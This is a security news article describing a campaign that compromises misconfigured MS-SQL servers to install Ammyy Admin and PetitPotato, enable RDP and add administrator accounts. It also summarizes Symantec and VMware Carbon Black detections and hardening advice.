A recent threat campaign has come to light in which cybercriminals are actively targeting poorly managed Microsoft SQL (MS-SQL) servers.
By exploiting improperly secured or misconfigured SQL environments, these attackers are able to compromise vulnerable systems and deploy a combination of remote access and privilege escalation tools, notably Ammyy Admin and PetitPotato malware, to establish and maintain unauthorized access.
Sophisticated Multi-Stage Intrusion and Persistence Techniques
The attack chain begins with threat actors scanning the internet for exposed MS-SQL servers with weak credentials or outdated security configurations.
Upon initial compromise, the attackers execute commands to enumerate system information and assess the environment’s suitability for further exploitation.
Using WGet, a widely available network utility, they download and install malware packages onto the compromised server.
Among the payloads deployed are Ammyy Admin, a legitimate remote desktop tool often abused for illicit remote control, and PetitPotato, a well-known privilege escalation utility that leverages Windows security flaws to obtain system-level privileges.
Moving swiftly, the attackers seek to broaden their foothold by enabling Windows Remote Desktop Protocol (RDP) services allowing them ongoing graphical access to the server.
Additionally, new user accounts are created, often with administrative rights, further entrenching persistent access and making detection and removal more challenging for defenders.
Security researchers highlight that this campaign employs a blend of legitimate administration tools and sophisticated malware, making it difficult for traditional security solutions to distinguish between authorized and malicious activity.
This dual-use approach increases the likelihood of evasion and prolongs the attacker’s presence within affected networks.
Symantec and VMware Carbon Black Countermeasures
In response to this emerging threat, Symantec has updated its protections to detect and block associated malicious indicators through multiple vectors.
File-based detections, including signatures such as Hacktool.Gen, Hacktool.Porttran, Trojan.Gen.MBT, and WS.Malware.1, target known malware strains and tools used throughout the attack.
Machine learning enhancements within Symantec’s security infrastructure such as Heur.AdvML.A!300, Heur.AdvML.B, and related variants provide additional layers of detection, analyzing behavioral and heuristic indicators to flag novel or suspicious activity.
Furthermore, VMware Carbon Black customers benefit from comprehensive endpoint protection policies, which block the execution of both known and suspected malware, as well as potentially unwanted programs (PUPs).
The Carbon Black Cloud reputation service augments these defenses by delaying execution for cloud-based scans, thereby improving detection accuracy and reducing false positives.
According to the Report, Web-based threats linked to the campaign, including malicious domains and IPs leveraged during deployment and lateral movement, are also covered under WebPulse-enabled security products, ensuring users are protected from command-and-control interactions and malware downloads.
Security experts advise organizations to immediately audit and harden their MS-SQL server deployments, enforce strong authentication mechanisms, and restrict external access to management interfaces.
Regularly updating software, monitoring for unusual account creations, and deploying layered endpoint detection and response tools are also critical in defending against this class of attacks.
As cybercriminals continue to innovate and refine their tactics, defenders must remain vigilant and leverage a combination of signature-based, machine learning, and reputation-driven security technologies to minimize risk and protect critical database infrastructure.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
 servers.){kind=link}